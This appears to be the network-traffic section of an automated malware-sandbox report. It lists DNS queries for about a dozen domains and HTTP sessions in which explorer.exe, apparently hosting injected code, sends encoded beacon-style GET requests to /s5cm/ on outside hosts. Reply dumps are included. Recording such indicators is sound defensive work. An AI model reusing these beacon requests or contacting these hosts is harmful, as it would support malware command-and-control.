May 31, 2021 21:47:20.857841969 CEST	50700	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:20.936702967 CEST	53	50700	8.8.8.8	192.168.2.6
May 31, 2021 21:47:26.145761967 CEST	54069	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:26.217125893 CEST	53	54069	8.8.8.8	192.168.2.6
May 31, 2021 21:47:31.468655109 CEST	61178	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:31.561366081 CEST	53	61178	8.8.8.8	192.168.2.6
May 31, 2021 21:47:34.266110897 CEST	57017	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:34.335097075 CEST	53	57017	8.8.8.8	192.168.2.6
May 31, 2021 21:47:34.750911951 CEST	56327	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:34.817965984 CEST	53	56327	8.8.8.8	192.168.2.6
May 31, 2021 21:47:36.678939104 CEST	50243	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:36.840936899 CEST	53	50243	8.8.8.8	192.168.2.6
May 31, 2021 21:47:39.454493046 CEST	62055	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:39.538191080 CEST	53	62055	8.8.8.8	192.168.2.6
May 31, 2021 21:47:42.932303905 CEST	61249	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:43.007661104 CEST	53	61249	8.8.8.8	192.168.2.6
May 31, 2021 21:47:53.652554035 CEST	65252	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:53.719017029 CEST	53	65252	8.8.8.8	192.168.2.6
May 31, 2021 21:47:58.019201994 CEST	64367	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:58.081271887 CEST	53	64367	8.8.8.8	192.168.2.6
May 31, 2021 21:47:59.317436934 CEST	55066	53	192.168.2.6	8.8.8.8
May 31, 2021 21:47:59.533143044 CEST	53	55066	8.8.8.8	192.168.2.6
May 31, 2021 21:48:05.044843912 CEST	60211	53	192.168.2.6	8.8.8.8
May 31, 2021 21:48:05.208571911 CEST	53	60211	8.8.8.8	192.168.2.6
May 31, 2021 21:48:10.836824894 CEST	56570	53	192.168.2.6	8.8.8.8
May 31, 2021 21:48:10.906490088 CEST	53	56570	8.8.8.8	192.168.2.6
May 31, 2021 21:48:16.756913900 CEST	58454	53	192.168.2.6	8.8.8.8
May 31, 2021 21:48:16.845444918 CEST	53	58454	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 31, 2021 21:47:09.816098928 CEST	192.168.2.6	8.8.8.8	0x50ac	Standard query (0)	www.qizhukeji.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:15.691540956 CEST	192.168.2.6	8.8.8.8	0x9162	Standard query (0)	www.annafelicia.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:20.857841969 CEST	192.168.2.6	8.8.8.8	0xdea2	Standard query (0)	www.dominatedirectsales.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:26.145761967 CEST	192.168.2.6	8.8.8.8	0x8d22	Standard query (0)	www.campingquick.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:31.468655109 CEST	192.168.2.6	8.8.8.8	0x403f	Standard query (0)	www.votelaura.info	A (IP address)	IN (0x0001)
May 31, 2021 21:47:36.678939104 CEST	192.168.2.6	8.8.8.8	0x92ab	Standard query (0)	www.linjudama.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:42.932303905 CEST	192.168.2.6	8.8.8.8	0xdd5f	Standard query (0)	www.ursulaaubri.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:53.652554035 CEST	192.168.2.6	8.8.8.8	0xc827	Standard query (0)	www.500truyen.com	A (IP address)	IN (0x0001)
May 31, 2021 21:47:59.317436934 CEST	192.168.2.6	8.8.8.8	0x3dd8	Standard query (0)	www.ecms2019.net	A (IP address)	IN (0x0001)
May 31, 2021 21:48:05.044843912 CEST	192.168.2.6	8.8.8.8	0x3c1f	Standard query (0)	www.rnrsans.com	A (IP address)	IN (0x0001)
May 31, 2021 21:48:10.836824894 CEST	192.168.2.6	8.8.8.8	0x32da	Standard query (0)	www.zaseto.com	A (IP address)	IN (0x0001)
May 31, 2021 21:48:16.756913900 CEST	192.168.2.6	8.8.8.8	0x5420	Standard query (0)	www.byyourstruly.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 31, 2021 21:47:10.028803110 CEST	8.8.8.8	192.168.2.6	0x50ac	No error (0)	www.qizhukeji.com		208.110.82.29	A (IP address)	IN (0x0001)
May 31, 2021 21:47:15.755547047 CEST	8.8.8.8	192.168.2.6	0x9162	No error (0)	www.annafelicia.com	annafelicia.com		CNAME (Canonical name)	IN (0x0001)
May 31, 2021 21:47:15.755547047 CEST	8.8.8.8	192.168.2.6	0x9162	No error (0)	annafelicia.com		192.0.78.25	A (IP address)	IN (0x0001)
May 31, 2021 21:47:15.755547047 CEST	8.8.8.8	192.168.2.6	0x9162	No error (0)	annafelicia.com		192.0.78.24	A (IP address)	IN (0x0001)
May 31, 2021 21:47:20.936702967 CEST	8.8.8.8	192.168.2.6	0xdea2	No error (0)	www.dominatedirectsales.com	dominatedirectsales.com		CNAME (Canonical name)	IN (0x0001)
May 31, 2021 21:47:20.936702967 CEST	8.8.8.8	192.168.2.6	0xdea2	No error (0)	dominatedirectsales.com		34.102.136.180	A (IP address)	IN (0x0001)
May 31, 2021 21:47:26.217125893 CEST	8.8.8.8	192.168.2.6	0x8d22	No error (0)	www.campingquick.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
May 31, 2021 21:47:26.217125893 CEST	8.8.8.8	192.168.2.6	0x8d22	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
May 31, 2021 21:47:31.561366081 CEST	8.8.8.8	192.168.2.6	0x403f	No error (0)	www.votelaura.info		217.160.0.220	A (IP address)	IN (0x0001)
May 31, 2021 21:47:36.840936899 CEST	8.8.8.8	192.168.2.6	0x92ab	No error (0)	www.linjudama.com	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
May 31, 2021 21:47:36.840936899 CEST	8.8.8.8	192.168.2.6	0x92ab	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		52.14.32.15	A (IP address)	IN (0x0001)
May 31, 2021 21:47:36.840936899 CEST	8.8.8.8	192.168.2.6	0x92ab	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.143.65.214	A (IP address)	IN (0x0001)
May 31, 2021 21:47:36.840936899 CEST	8.8.8.8	192.168.2.6	0x92ab	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		13.59.53.244	A (IP address)	IN (0x0001)
May 31, 2021 21:47:43.007661104 CEST	8.8.8.8	192.168.2.6	0xdd5f	No error (0)	www.ursulaaubri.com		91.184.0.43	A (IP address)	IN (0x0001)
May 31, 2021 21:47:53.719017029 CEST	8.8.8.8	192.168.2.6	0xc827	No error (0)	www.500truyen.com		172.67.155.68	A (IP address)	IN (0x0001)
May 31, 2021 21:47:53.719017029 CEST	8.8.8.8	192.168.2.6	0xc827	No error (0)	www.500truyen.com		104.21.72.213	A (IP address)	IN (0x0001)
May 31, 2021 21:47:59.533143044 CEST	8.8.8.8	192.168.2.6	0x3dd8	No error (0)	www.ecms2019.net		154.208.179.46	A (IP address)	IN (0x0001)
May 31, 2021 21:48:05.208571911 CEST	8.8.8.8	192.168.2.6	0x3c1f	No error (0)	www.rnrsans.com		208.91.197.27	A (IP address)	IN (0x0001)
May 31, 2021 21:48:10.906490088 CEST	8.8.8.8	192.168.2.6	0x32da	No error (0)	www.zaseto.com		217.198.116.188	A (IP address)	IN (0x0001)
May 31, 2021 21:48:16.845444918 CEST	8.8.8.8	192.168.2.6	0x5420	Name error (3)	www.byyourstruly.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.qizhukeji.com

www.annafelicia.com

www.dominatedirectsales.com

www.campingquick.com

www.votelaura.info

www.linjudama.com

www.ursulaaubri.com

www.500truyen.com

www.ecms2019.net

www.rnrsans.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49752	208.110.82.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:10.198590040 CEST	6369	OUT	GET /s5cm/?IBZlYbB=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbv/UczETu56Vlk6A==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.qizhukeji.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:10.510684013 CEST	6371	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 31 May 2021 19:47:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 35 64 62 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 20 0d 0a 20 20 3c 74 69 74 6c 65 3e 26 23 32 31 39 31 37 3b 26 23 32 31 38 36 30 3b 26 23 33 37 32 30 32 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 31 39 31 37 3b 26 23 32 31 38 36 30 3b 26 23 33 37 32 30 32 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 22 20 2f 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e8 bf 99 e9 87 8c e6 98 af 26 23 32 31 39 31 37 3b 26 23 32 31 38 36 30 3b 26 23 33 37 32 30 32 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b e9 ab 98 e6 b8 85 e5 9b be e7 89 87 e8 81 9a e5 90 88 e9 a1 b5 e9 9d a2 ef bc 8c e6 95 b0 e5 8d 81 e9 83 a8 26 23 32 31 39 31 37 3b 26 23 32 31 38 36 30 3b 26 23 33 37 32 30 32 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b e5 85 a8 e9 83 a8 e6 94 af e6 8c 81 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b e3 80 82 22 20 2f 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 68 74 6d 6c 35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 71 69 7a 68 75 6b 65 6a 69 2e 63 6f 6d 2f 59 36 4c 2f 22 20 2f 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 61 67 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 6d 61 74 3d 78 68 74 6d 6c 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 71 69 7a 68 75 6b 65 6a 69 2e 63 6f 6d 2f 59 36 4c 2f 22 20 2f 3e 20 0d 0a 20 20 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 31 32 33 31 32 33 31 32 33 31 32 33 31 32 33 66 61 73 66 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e5 85 8d e8 b4 b9 e5 9b be e7 89 87 e5 88 86 e4 ba ab e7 bd 91 22 7d 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 76 69 65 77 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 75 61 72 65 64 69 72 65 63 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 69 7a 68 75 6b 65 6a 69 2e 63 6f 6d 2f 59 36 4c 2f 22 29 3b 3c 2f 73 63 72 69 70 74 3e 20 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 77 61 70 2e 78 68 74 6d 6c 2b 78 6d 6c 22 20 6d 65 64 69 61 3d 22 68 61 6e 64 68 65 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 69 7a 68 75 6b 65 6a 69 2e 63 6f 6d 2f 59 36 4c 2f 22 20 2f 3e 20 0d 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 20 0d 0a 20 3c 2f 68 65 61 64 3e 20 0d 0a 20 3c 62 6f 64 79 3e 20 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 34 38 30 36 36 30 30 34 39 36 34 33 31 37 31 31 39 35 37 35 32 37 35 20 6e 61 76 69 22 3e 20 0d 0a 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: 5dbd<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>喝啤酒图片高清在线观看</title> <meta name="keywords" content="喝啤酒图片" /> <meta name="description" content="喝啤酒图片喝啤酒图片" /> <meta name="mobile-agent" content="format=html5;url=http://www.qizhukeji.com/Y6L/" /> <meta name="mobile-agent" content="format=xhtml;url=http://www.qizhukeji.com/Y6L/" /> <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("123123123123123fasf") == -1){document.title =""}</script> <script src="/static/view.js"></script> <script>uaredirect("http://www.qizhukeji.com/Y6L/");</script> <link rel="alternate" type="application/vnd.wap.xhtml+xml" media="handheld" href="http://www.qizhukeji.com/Y6L/" /> <link href="/images/style.css" type="text/css" rel="stylesheet" /> </head> <body> <div class="48066004964317119575275 navi"> <div class=
May 31, 2021 21:47:10.510737896 CEST	6373	IN	Data Raw: 22 34 38 30 36 36 30 30 34 39 36 34 33 31 37 31 31 39 35 37 35 32 37 35 20 6d 65 6e 75 22 3e 20 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 67 69 66 22 20 2f 3e 3c 2f Data Ascii: "48066004964317119575275 menu"> <a href="/"><img src="/images/logo.gif" /></a> <ul> <li><a href="/v/yule/"></a></li> <li><a href="/v/zongyi/"></a></li> <li><a href="/v/youxi/"></a></li>
May 31, 2021 21:47:10.510773897 CEST	6374	IN	Data Raw: 23 33 37 32 30 32 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 3c 2f 64 69 76 2d 2d 3e 20 0d 0a 20 20 20 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0d 0a 3c 68 Data Ascii: #37202;图片</div--> <div align="center" style="display:none"><h2>喝啤酒图片</h2>,喝啤酒图片高清在线观看,喝啤酒
May 31, 2021 21:47:10.510813951 CEST	6375	IN	Data Raw: 2f 3e 3c 65 6d 3e 3c 2f 65 6d 3e 0d 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 34 38 30 36 36 30 30 34 39 36 34 33 31 37 31 31 39 35 37 35 32 37 35 20 74 62 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d Data Ascii: /><em></em> <div class="48066004964317119575275 tb"> <span class="left">300x515</span> <span class="right">2017-04-18 07:18:00</span> </div><h3></h3></a></li> <li><a href="/p-okyv.ht
May 31, 2021 21:47:10.510850906 CEST	6377	IN	Data Raw: 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 32 32 30 78 34 32 39 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 69 67 68 74 22 3e 32 30 31 30 2d 30 31 2d 31 34 20 30 30 3a 30 30 3a 30 30 3c 2f 73 70 61 Data Ascii: class="left">220x429</span> <span class="right">2010-01-14 00:00:00</span> </div><h3></h3></a></li> <li><a href="/p-okyw.html" target="_blank"><img class="tu" src="/v/img-aHR0cDovL2ltZzEuaW1ndG4uYmRpbW
May 31, 2021 21:47:10.510898113 CEST	6378	IN	Data Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 34 38 30 36 36 30 30 34 39 36 34 33 31 37 31 31 39 35 37 35 32 37 35 20 74 62 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 34 38 30 78 36 34 30 3c Data Ascii: <div class="48066004964317119575275 tb"> <span class="left">480x640</span> <span class="right">2010-01-14 00:00:00</span> </div><h3> (1)</h3></a></li> <li><a href="/p-okyz.html" targ
May 31, 2021 21:47:10.510940075 CEST	6379	IN	Data Raw: 30 34 39 36 34 33 31 37 31 31 39 35 37 35 32 37 35 20 74 62 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 32 38 30 78 32 38 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 Data Ascii: 04964317119575275 tb"> <span class="left">280x280</span> <span class="right">2018-05-04 08:13:00</span> </div><h3></h3></a></li> <li><a href="/p-okyM.html" target="_blank"><img class="tu" sr
May 31, 2021 21:47:10.510978937 CEST	6381	IN	Data Raw: 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 32 35 33 78 33 32 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 69 67 68 74 22 3e 32 30 31 34 2d 30 39 2d 31 35 20 30 30 3a Data Ascii: <span class="left">253x320</span> <span class="right">2014-09-15 00:00:00</span> </div><h3></h3></a></li> <li><a href="/p-okyX.html" target="_blank"><img class="tu" src="/v/img-aHR0cDovL2ltZz
May 31, 2021 21:47:10.511018038 CEST	6382	IN	Data Raw: 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 36 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 2f 73 35 63 6d 2f 37 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 37 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 2f 73 35 63 6d 2f 38 2f 22 20 74 61 Data Ascii: rget="_blank">6</a> <a href="/s5cm/7/" target="_blank">7</a> <a href="/s5cm/8/" target="_blank">8</a> <a href="/s5cm/9/" target="_blank">9</a> <a href="/s5cm/10/" target="_blank">10</a> <a href="/s5cm/11/" target="_blank">11</a> <a href="/s5cm
May 31, 2021 21:47:10.511055946 CEST	6384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 69 6e 65 50 22 3e e8 bf 87 e7 a8 8b e6 80 9d e8 80 83 e4 bd a0 e5 96 9c e6 ac a2 e7 9a 84 e5 9b be e7 89 87 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <p class="lineP"></p> <a href="/v/shenghuo/" class="Lbtn"></a> </div> </div> </div> </div>
May 31, 2021 21:47:10.669900894 CEST	6385	IN	Data Raw: 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 36 34 30 78 36 34 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 69 67 68 74 22 3e 32 30 31 39 2d 31 32 2d 32 39 20 30 Data Ascii: <span class="left">640x640</span> <span class="right">2019-12-29 00:00:00</span> </div><h3> logo logo</h3></a></li> <li><a href="/p-jpn

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49753	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:15.799329042 CEST	6396	OUT	GET /s5cm/?IBZlYbB=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.annafelicia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:15.841366053 CEST	6397	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 31 May 2021 19:47:15 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.annafelicia.com/s5cm/?IBZlYbB=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&7no=4hLljrWPCjYL X-ac: 2.hhn _dca Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49754	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:20.980269909 CEST	6398	OUT	GET /s5cm/?IBZlYbB=xBEbFjLoFuodrC/FrIHi+p11i3u3J0p5GQZ8VsaHNTM97bQrkmKUKcAvoM41Kg57v7PXkPt2Cg==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.dominatedirectsales.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:21.118275881 CEST	6398	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 31 May 2021 19:47:21 GMT Content-Type: text/html Content-Length: 275 ETag: "60b14ede-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49755	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:26.262584925 CEST	6399	OUT	GET /s5cm/?IBZlYbB=ykmySD41HqpRsFExsLJzaB/DPTfNPkk2Lc0Pz7ATifvot7ncWrGAE7TUgg0cf+ItDyGbmwzT/w==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.campingquick.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:26.447938919 CEST	6400	IN	HTTP/1.1 403 Forbidden Date: Mon, 31 May 2021 19:47:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 155 X-Sorting-Hat-ShopId: 42097016988 X-Dc: gcp-us-central1 X-Request-ID: 0a3da749-6868-4f17-b573-6afea417e773 X-Download-Options: noopen X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC cf-request-id: 0a659091d600004ec1998fb000000001 Server: cloudflare CF-RAY: 6582b6c958834ec1-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 